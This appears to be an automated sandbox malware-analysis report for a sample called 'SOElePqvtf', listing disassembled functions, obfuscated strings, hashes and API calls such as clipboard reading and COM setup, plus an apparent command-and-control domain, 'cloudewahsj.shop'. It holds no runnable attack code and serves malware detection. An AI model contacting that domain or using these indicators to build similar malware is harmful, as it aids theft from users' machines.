l, xrefs: 0211E33F
?, xrefs: 0211E653
[, xrefs: 0211E5FE
E, xrefs: 0211EDF8
S, xrefs: 0211E62B
4, xrefs: 0211E6CB
:, xrefs: 0211E6EA
c, xrefs: 0211E69E
L, xrefs: 0211E67B
z, xrefs: 0211E6B7
>, xrefs: 0211E699
{, xrefs: 0211E792
i, xrefs: 0211EE1B
6, xrefs: 0211E852
|, xrefs: 0211E3BF
c, xrefs: 0211E68A
k, xrefs: 0211EE11
u, xrefs: 0211E6BC
L, xrefs: 0211E6C6
], xrefs: 0211E3C7
Z, xrefs: 0211E65D
b, xrefs: 0211E6D5
h, xrefs: 0211E6AD
Z, xrefs: 0211E60D
t, xrefs: 0211E461
C, xrefs: 0211E644
k, xrefs: 0211E722
?, xrefs: 0211E862
4, xrefs: 0211E449
/, xrefs: 0211E79A
i, xrefs: 0211EE20
Q, xrefs: 0211E608
~, xrefs: 0211E6C1
P, xrefs: 0211E5EF
h, xrefs: 0211E612
?, xrefs: 0211E85A
s, xrefs: 0211E36F
u, xrefs: 0211E694
., xrefs: 0211E3AF
o, xrefs: 0211EE25
g, xrefs: 0211E5EA
~, xrefs: 0211E367
L, xrefs: 0211E630
L, xrefs: 0211E86A
d, xrefs: 0211EE02
R, xrefs: 0211E671
7, xrefs: 0211E441
q, xrefs: 0211F2A9
V, xrefs: 0211E603
S, xrefs: 0211E626
G, xrefs: 0211E82A
[, xrefs: 0211EDEE
t, xrefs: 0211E6A3
C, xrefs: 0211E63A
p, xrefs: 0211E772
<, xrefs: 0211E621
v, xrefs: 0211E77A
\, xrefs: 0211E38F
9, xrefs: 0211E822
k, xrefs: 0211E872
S, xrefs: 0211E6F2
q, xrefs: 0211E63F
F, xrefs: 0211E882
c, xrefs: 0211E76A
N, xrefs: 0211E667
e, xrefs: 0211EE07
(, xrefs: 0211E74A
y, xrefs: 0211E87A
x, xrefs: 0211E6A8
p, xrefs: 0211E68F
!, xrefs: 0211E73A
|, xrefs: 0211E66C
}, xrefs: 0211E377
*, xrefs: 0211E3A7
F, xrefs: 0211EDFD
I, xrefs: 0211E7DA
g, xrefs: 0211EE0C
J, xrefs: 0211E64E

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
API String ID: 0-1873956536
Opcode ID: 956e5634ba402c0b98be263ec24341df1d894c542c900cdbbef8950896477da6
Instruction ID: e2f2cc47c1471da0ca014c3ea2620139ff99fb810bfa35368f69969ab0ea48ad
Opcode Fuzzy Hash: 956e5634ba402c0b98be263ec24341df1d894c542c900cdbbef8950896477da6
Instruction Fuzzy Hash: C9B28E7164C7C08FD325CA78885439EBBD2ABD6324F094A6DE8E9873C1D7799809C753

Function 0042621B Relevance: 33.7, Strings: 26, Instructions: 1202COMMON

Download Yara Rule

Strings

zx, xrefs: 00426426
2U/W, xrefs: 00426A91
Ta\c, xrefs: 00426AB2
Vt%t, xrefs: 00426E81
bxB, xrefs: 00427850
{HyN, xrefs: 004270B3
nl, xrefs: 0042663C
SP, xrefs: 004270C9
3416, xrefs: 004275C5
:vt, xrefs: 00426872
7J0H, xrefs: 00426452
Z[, xrefs: 00426E5E
2{<u, xrefs: 00426E06
7w, xrefs: 00426E11
6fd, xrefs: 00426846
3416, xrefs: 004273A5
jh, xrefs: 00426647
F;D, xrefs: 00426431
N>_<, xrefs: 00426560
s@qF, xrefs: 0042700F
Teg, xrefs: 00426ABD
qVol, xrefs: 004272F5, 0042730C, 004273DA, 004273EA
'Y<[, xrefs: 00426A70
wDuJ, xrefs: 004270A8
zx, xrefs: 0042661B
(]2_, xrefs: 00426A7B

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: F;D$zx$'Y<[$(]2_$2U/W$2{<u$3416$3416$6fd$7J0H$7w$:vt$N>_<$SP$Ta\c$Teg$Vt%t$Z[$bxB$qVol$s@qF$wDuJ${HyN$jh$nl$zx
API String ID: 0-2025997952
Opcode ID: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
Instruction ID: 8ebcec6048e81b7414bf2c44ea1e9f7dace67e943cef4cf10300ed7be7304af5
Opcode Fuzzy Hash: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
Instruction Fuzzy Hash: D1B273B160C3918BD334CF14D8417ABBBF2FB95304F44892DD4C99B252D7798A4ADB8A

Function 0213D337 Relevance: 27.2, APIs: 8, Strings: 7, Instructions: 957memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(80838290,00000000,00000001,?,00000000), ref: 0213D7D9
SysAllocString.OLEAUT32 ref: 0213D86F
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0213D8AD
SysAllocString.OLEAUT32 ref: 0213D90F
SysAllocString.OLEAUT32 ref: 0213D9CC
VariantInit.OLEAUT32(?), ref: 0213DA3D
SysFreeString.OLEAUT32(00000000), ref: 0213DDC4

Strings

yv, xrefs: 0213DA7A
tu, xrefs: 0213D813
[B, xrefs: 0213D48C
fF, xrefs: 0213D837
[J, xrefs: 0213D484
CfF, xrefs: 0213D867
{pqv, xrefs: 0213D387

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
String ID: fF$CfF$[B$[J$tu$yv${pqv
API String ID: 2895375541-1972840126
Opcode ID: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
Instruction ID: 30094ec33deffa6b404865201482d00da5bb6aaef2bb711af6b01ea19e9d38b7
Opcode Fuzzy Hash: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
Instruction Fuzzy Hash: 2E6224726583508FE324CF28D8957ABBBE2EFC5314F15892CE5D58B390D7799809CB82

Function 00417222 Relevance: 25.6, APIs: 4, Strings: 10, Instructions: 1137COMMON

Download Yara Rule

Strings

*, xrefs: 00418053
ruA, xrefs: 0041755F
7, xrefs: 00417D7E
pA, xrefs: 004176B7
}&'$, xrefs: 00417BD7
), xrefs: 0041747C
>gVf, xrefs: 00417278, 004172A4
WH, xrefs: 00417D6E
X2c0, xrefs: 00417775
TW, xrefs: 00417D76

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: pA$)$*$7$>gVf$TW$WH$X2c0$ruA$}&'$
API String ID: 0-2465278142
Opcode ID: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
Instruction ID: db295268db8bdf45a891635b6dee4b286def9570c954afad4e7b9bb962e3f9ad
Opcode Fuzzy Hash: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
Instruction Fuzzy Hash: 947211756483528BD324CF28C8917ABBBF1FF95314F18896DE4C58B3A1E7388945CB86

Function 0041618C Relevance: 14.8, Strings: 11, Instructions: 1044COMMON

Download Yara Rule

Strings

EnA, xrefs: 00416E3F
y~, xrefs: 00416283
YjM, xrefs: 00416BF6
6, xrefs: 00416C5B
fjM, xrefs: 00416B0D
yx, xrefs: 0041628E
6y, xrefs: 00416278
fjM, xrefs: 00416BB3
YjM, xrefs: 00416B56
pSlM, xrefs: 00416406
{, xrefs: 00416299

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: 6$6y$EnA$YjM$YjM$fjM$fjM$pSlM$yx$y~${
API String ID: 0-2342033412
Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
Opcode Fuzzy Hash: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A

Function 00411BDE Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 555COMMON

Download Yara Rule

Strings

$, xrefs: 0041203F
&, xrefs: 00412044
J, xrefs: 00411BF1
A, xrefs: 00411FB9
5, xrefs: 0041219B
t, xrefs: 00411C84

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: $$&$5$A$J$t
API String ID: 0-1619763526
Opcode ID: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
Instruction ID: a53242e4cf12c94eabb5fc35352f39a952aaa25ff7b8dface19663bb3d57fcdd
Opcode Fuzzy Hash: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
Instruction Fuzzy Hash: FB22B07160C7808BC7249B38C5943AFBBE1ABC5324F184A2EE9E9D73C1D77889458B47

Function 02111E45 Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 555COMMON

Download Yara Rule

Strings

&, xrefs: 021122AB
$, xrefs: 021122A6
t, xrefs: 02111EEB
5, xrefs: 02112402
J, xrefs: 02111E58
A, xrefs: 02112220

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: $$&$5$A$J$t
API String ID: 0-1619763526
Opcode ID: 79d2da70b477ffa677f65aeaf4e6cacd56928a13efaa06ce3925f393d5a94fe9
Instruction ID: 4d5d572692ce4223f9111cdb5abe1c216f70bda11ba057ad64971646365ed42c
Opcode Fuzzy Hash: 79d2da70b477ffa677f65aeaf4e6cacd56928a13efaa06ce3925f393d5a94fe9
Instruction Fuzzy Hash: 0422807164C7908FD7289B38C4943AEBBE2AB95324F194A3DD8E9873C1D7788905CB43

Function 0040E16E Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040E17A

Strings

cloudewahsj.shop, xrefs: 0040E631
RYZ[, xrefs: 0040E52E
yD, xrefs: 0040E29A
c[i!, xrefs: 0040E2CB
Zb, xrefs: 0040E188
UGC9, xrefs: 0040E2E1

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: Uninitialize
String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
API String ID: 3861434553-1392773931
Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96

Function 0210E3D5 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 0210E3E1

Strings

UGC9, xrefs: 0210E548
yD, xrefs: 0210E501
cloudewahsj.shop, xrefs: 0210E898
RYZ[, xrefs: 0210E795
c[i!, xrefs: 0210E532
Zb, xrefs: 0210E3EF

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
API String ID: 3861434553-1392773931
Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction ID: 1d417274afda7e2da37bcfcd2b8604a9295debe35f5ba893f859a1a7c6d2c284
Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction Fuzzy Hash: 66C1207154C3C08BDB348F25D4A87ABBBE1AFD2304F084D6DD4D95B286D7B8450ACB96

Function 00409B70 Relevance: 10.4, Strings: 8, Instructions: 418COMMON

Download Yara Rule

Strings

~9, xrefs: 00409F05
]NGD, xrefs: 00409D94
yD, xrefs: 00409CEB
0335F29CCD96CC48822D1F4978021086, xrefs: 00409C45
UJVM, xrefs: 00409D7E
EVA^, xrefs: 00409D89
VW, xrefs: 00409F9D
b, xrefs: 00409E73

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: 0335F29CCD96CC48822D1F4978021086$EVA^$UJVM$VW$]NGD$b$~9$yD
API String ID: 0-447046403
Opcode ID: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
Instruction ID: ffcda9fbc27d5fd1cec50cde84d534a082da3ff5d4e5b8e77816747385cb8e1d
Opcode Fuzzy Hash: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
Instruction Fuzzy Hash: 82E1D1715083808BD724CF24C8947ABBBE2FFD5308F08892DE4D99B392DB798509CB56

Function 0040B280 Relevance: 10.4, Strings: 8, Instructions: 384COMMON

Download Yara Rule

Strings

S;G%, xrefs: 0040B3DB
UGEA, xrefs: 0040B292
DM_e, xrefs: 0040B362, 0040B513
x[G, xrefs: 0040B350
SV, xrefs: 0040B66F
ox}k, xrefs: 0040B5A4, 0040B550, 0040B6B2, 0040B6A6, 0040B739, 0040B76C, 0040B742, 0040B725, 0040B695
)Ku, xrefs: 0040B43B
c[G, xrefs: 0040B2BB

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
API String ID: 0-3323421312
Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B

Function 0210B4E7 Relevance: 10.4, Strings: 8, Instructions: 384COMMON

Download Yara Rule

Strings

ox}k, xrefs: 0210B9A0, 0210B9A9, 0210B8FC, 0210B7B7, 0210B90D, 0210B80B, 0210B9D3, 0210B98C, 0210B919
DM_e, xrefs: 0210B5C9, 0210B77A
SV, xrefs: 0210B8D6
S;G%, xrefs: 0210B642
UGEA, xrefs: 0210B4F9
c[G, xrefs: 0210B522
x[G, xrefs: 0210B5B7
)Ku, xrefs: 0210B6A2

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
API String ID: 0-3323421312
Opcode ID: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
Instruction ID: 8cbe19e0bb66b92a5d1f4c1df68bd7d4ee4969bb5561a7e5e2968de599b8783d
Opcode Fuzzy Hash: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
Instruction Fuzzy Hash: F7D1267194C3808BD324CF25849476BFBE2AFD170CF19892DE4E55B385D7B58A0ACB86

Function 00409360 Relevance: 10.3, Strings: 8, Instructions: 272COMMON

Download Yara Rule

Strings

eMOK, xrefs: 004093F0
vu, xrefs: 004094D7
ADTD, xrefs: 00409428
E, xrefs: 00409388
vxtq, xrefs: 00409440
|xzy, xrefs: 00409438
ID, xrefs: 004093E2
Y, xrefs: 004094DE

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
API String ID: 0-1466227541
Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A

Function 021095C7 Relevance: 10.3, Strings: 8, Instructions: 272COMMON

Download Yara Rule

Strings

|xzy, xrefs: 0210969F
E, xrefs: 021095EF
Y, xrefs: 02109745
ADTD, xrefs: 0210968F
vu, xrefs: 0210973E
vxtq, xrefs: 021096A7
ID, xrefs: 02109649
eMOK, xrefs: 02109657

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
API String ID: 0-1466227541
Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction ID: 2dc7d8dfa5b3ad60821bd6843a8d636c6f21739a0e19ccee471d789e24b1f228
Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction Fuzzy Hash: BA71F07158C3C68AD3118F7AC4A076BFFE0AF92754F18496DE4D08B392D3B98109DB56

Function 0042A7F0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 573COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF

Strings

*, xrefs: 0042AA93, 0042AB95, 0042AA60
*, xrefs: 0042AC00
q, xrefs: 0042ADA6

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: *$*$q
API String ID: 237503144-4001757600
Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86

Function 00409660 Relevance: 9.2, Strings: 7, Instructions: 448COMMON

Download Yara Rule

Strings

4?!;, xrefs: 004097F1
6?34, xrefs: 004096B0
$i|3, xrefs: 00409811
9;#&, xrefs: 00409801
?+9&, xrefs: 00409809
)--l, xrefs: 00409819
K, xrefs: 00409A9E

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
API String ID: 0-2829372548
Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
Instruction ID: 6807048b151084a9e8e11973f3dfbc4b5eda1ab4f65a555cc9214e5bb2479a1e
Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
Instruction Fuzzy Hash: 2DD1247120C7818BD729CF29C45036BBFE1AB97314F0889AED0D5DB382DA3D8909C756

Function 021098C7 Relevance: 9.2, Strings: 7, Instructions: 448COMMON

Download Yara Rule

Strings

K, xrefs: 02109D05
?+9&, xrefs: 02109A70
)--l, xrefs: 02109A80
4?!;, xrefs: 02109A58
9;#&, xrefs: 02109A68
$i|3, xrefs: 02109A78
6?34, xrefs: 02109917

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
API String ID: 0-2829372548
Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
Instruction ID: 04f951434bf7f11b89979e73713796324f31a6b7f8cbb4688e19d4ecb150dba0
Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
Instruction Fuzzy Hash: ACD1067160C7818BD729CF29C46176BBFE1AF97218F0889ADD0D5CB382DB798509C752

Function 00437A60 Relevance: 9.1, APIs: 6, Instructions: 119clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00437A74
GetClipboardData.USER32 ref: 00437A8F
GlobalLock.KERNEL32 ref: 00437AAE
GlobalUnlock.KERNEL32 ref: 00437BE6
CloseClipboard.USER32 ref: 00437BF1

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7

Function 0043C6C0 Relevance: 9.1, Strings: 7, Instructions: 361COMMON

Download Yara Rule

Strings

O, xrefs: 0043C99B
A, xrefs: 0043C996
g, xrefs: 0043C9A0
f, xrefs: 0043CA5B
j, xrefs: 0043CA56
q, xrefs: 0043C991
>, xrefs: 0043CA51

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: >$A$O$f$g$j$q
API String ID: 0-654885204
Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
Instruction ID: 933c444832a5593444b97503960d5bfec1f1b34db4cd747dab4759e8adc9f3c2
Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
Instruction Fuzzy Hash: DAD1F633A0C7D04AD324853C889535BAEC25BE6324F1D8B7EE9F5973C6D66D88068357

Function 0213C927 Relevance: 9.1, Strings: 7, Instructions: 361COMMON

Download Yara Rule

Strings

O, xrefs: 0213CC02
f, xrefs: 0213CCC2
A, xrefs: 0213CBFD
g, xrefs: 0213CC07
j, xrefs: 0213CCBD
>, xrefs: 0213CCB8
q, xrefs: 0213CBF8

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: >$A$O$f$g$j$q
API String ID: 0-654885204
Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
Instruction ID: 7de5d24cfd8e7acc3e2f66461c9b0863c1ccfb741ee74810124bc710534fdb31
Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
Instruction Fuzzy Hash: CCD10633A4C7D04AD329853C885539BAEC35BD2224F1D8B7EE9F9973C6D76988058393

Function 00428B10 Relevance: 8.0, Strings: 6, Instructions: 513COMMON

Download Yara Rule

Strings

LUC_, xrefs: 00429A17
J[, xrefs: 0042954C
we`k, xrefs: 00429A2F
x}{z, xrefs: 00429A3F
|A, xrefs: 00429544
Gt, xrefs: 0042953C

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: Gt$J[$LUC_$we`k$x}{z$|A
API String ID: 0-4062276182
Opcode ID: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
Instruction ID: f20c1733954f3d7476a331e7578cdc678171662c1333d6829e8b94656b24469a
Opcode Fuzzy Hash: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
Instruction Fuzzy Hash: 080200B5A08350CBD3209F25D84176BBBE2FFC6318F454A6DE5C85B390DB799805CB8A

Function 004042C0 Relevance: 6.7, Strings: 5, Instructions: 465COMMON

Download Yara Rule

Strings

IEND, xrefs: 0040479F
), xrefs: 0040433D
IDAT, xrefs: 0040472B
), xrefs: 00404347
IHDR, xrefs: 004046BC

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
Instruction ID: 828f2798e7534a509cb653a25c5a447f63e0741c52f375536a6b9b324fae408e
Opcode Fuzzy Hash: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
